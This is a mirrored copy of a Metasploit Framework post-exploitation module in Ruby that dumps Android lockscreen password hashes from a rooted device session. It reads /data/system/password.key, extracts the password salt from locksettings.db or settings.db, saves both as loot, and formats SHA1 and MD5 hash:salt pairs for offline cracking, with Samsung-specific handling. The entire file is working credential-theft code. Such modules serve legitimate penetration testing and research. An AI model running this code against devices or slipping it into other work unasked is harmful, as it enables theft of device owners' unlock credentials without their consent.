Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/gather/hashdump.rb
24756 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'sqlite3'

7
require 'fileutils'

8


9
class MetasploitModule < Msf::Post

10


11
  include Msf::Post::File

12
  include Msf::Post::Android::Priv

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Android Gather Dump Password Hashes for Android Systems',

19
        'Description' => %q{

20
          Post Module to dump the password hashes for Android System. Root is required.

21
          To perform this operation, two things are needed.  First, a password.key file

22
          is required as this contains the hash but no salt.  Next, a sqlite3 database

23
          is needed (with supporting files) to pull the salt from.  Combined, this

24
          creates the hash we need.  Samsung based devices change the hash slightly.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => ['h00die', 'timwr'],

28
        'SessionTypes' => [ 'meterpreter', 'shell' ],

29
        'Platform' => 'android',

30
        'References' => [

31
          ['URL', 'https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/'],

32
          ['URL', 'https://hashcat.net/forum/thread-2202.html'],

33
          ['ATT&CK', Mitre::Attack::Technique::T1003_OS_CREDENTIAL_DUMPING],

34
        ],

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42
  end

43


44
  def read_store_sql(location)

45
    # we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain

46
    # the values we are looking for

47
    db_loot_name = ''

48
    file_name = File.basename(location)

49
    ['', '-wal', '-shm'].each do |ext|

50
      l = location + ext

51
      next unless file_exist?(l)

52


53
      f = file_name + ext

54
      data = read_file(l)

55


56
      if data.blank?

57
        print_error("Unable to read #{l}")

58
        next

59
      end

60


61
      print_good("Saved #{f} with length #{data.length}")

62


63
      if ext == ''

64
        db_loot_name = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')

65
        next

66
      end

67


68
      loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')

69


70
      # in order for sqlite3 to see the -wal and -shm support files, we have to rename them

71
      # we have to do this since the ext is > 3

72
      # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391

73
      new_name = "#{db_loot_name}#{ext}"

74
      FileUtils.mv(loot_file, new_name)

75
    end

76


77
    SQLite3::Database.new(db_loot_name)

78
  end

79


80
  def run

81
    unless is_root?

82
      fail_with(Failure::NoAccess, 'This module requires root permissions.')

83
    end

84


85
    manu = cmd_exec('getprop ro.product.manufacturer')

86


87
    print_status('Attempting to determine unsalted hash.')

88
    key_file = '/data/system/password.key'

89
    unless file_exist?(key_file)

90
      print_error('No password.key file, no password on device.')

91
      return

92
    end

93


94
    hash = read_file(key_file)

95
    if hash.empty?

96
      print_error("Unable to read #{key_file}, and retrieve hash.")

97
      return

98
    end

99
    store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')

100
    print_good('Saved password.key')

101


102
    print_status('Attempting to determine salt')

103
    os = cmd_exec('getprop ro.build.version.release')

104
    vprint_status("OS Version: #{os}")

105


106
    locksettings_db = '/data/system/locksettings.db'

107
    locksettings_sql = "select value from locksettings where name='lockscreen.password_salt';"

108
    unless file_exist? locksettings_db

109
      vprint_status("Could not find #{locksettings_db}, using settings.db")

110
      locksettings_db = '/data/data/com.android.providers.settings/databases/settings.db'

111
      locksettings_sql = "select value from secure where name='lockscreen.password_salt';"

112
    end

113


114
    begin

115
      vprint_status("Attempting to load lockscreen db: #{locksettings_db}")

116
      db = read_store_sql(locksettings_db)

117
      if db.nil?

118
        print_error('Unable to load settings.db file.')

119
        return

120
      end

121
      salt = db.execute(locksettings_sql)

122
    rescue SQLite3::SQLException

123
      print_error("Failed to pull salt from database.  Command output: #{salt}")

124
      return

125
    end

126


127
    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative.

128


129
    # convert from number string to hex and lowercase

130
    salt = salt.to_i

131
    salt += 2**64 if salt < 0 # deal with negatives

132
    salt = salt.to_s(16)

133
    print_good("Password Salt: #{salt}")

134


135
    sha1 = hash[0...40]

136
    sha1 = "#{sha1}:#{salt}"

137
    print_good("SHA1: #{sha1}")

138
    credential_data = {

139
      # no way to tell them apart w/o knowing one is samsung or not.

140
      jtr_format: manu =~ /samsung/i ? 'android-samsung-sha1' : 'android-sha1',

141
      origin_type: :session,

142
      post_reference_name: refname,

143
      private_type: :nonreplayable_hash,

144
      private_data: sha1,

145
      session_id: session_db_id,

146
      username: '',

147
      workspace_id: myworkspace_id

148
    }

149
    create_credential(credential_data)

150


151
    if hash.length > 40 # devices other than Samsungs have sha1+md5 combined into a single string

152
      md5 = hash[40...72]

153
      md5 = "#{md5}:#{salt}"

154
      print_good("MD5: #{md5}")

155
      credential_data = {

156
        jtr_format: Metasploit::Framework::Hashes.identify_hash(md5),

157
        origin_type: :session,

158
        post_reference_name: refname,

159
        private_type: :nonreplayable_hash,

160
        private_data: md5,

161
        session_id: session_db_id,

162
        username: '',

163
        workspace_id: myworkspace_id

164
      }

165
      create_credential(credential_data)

166
    end

167
  end

168
end

169


170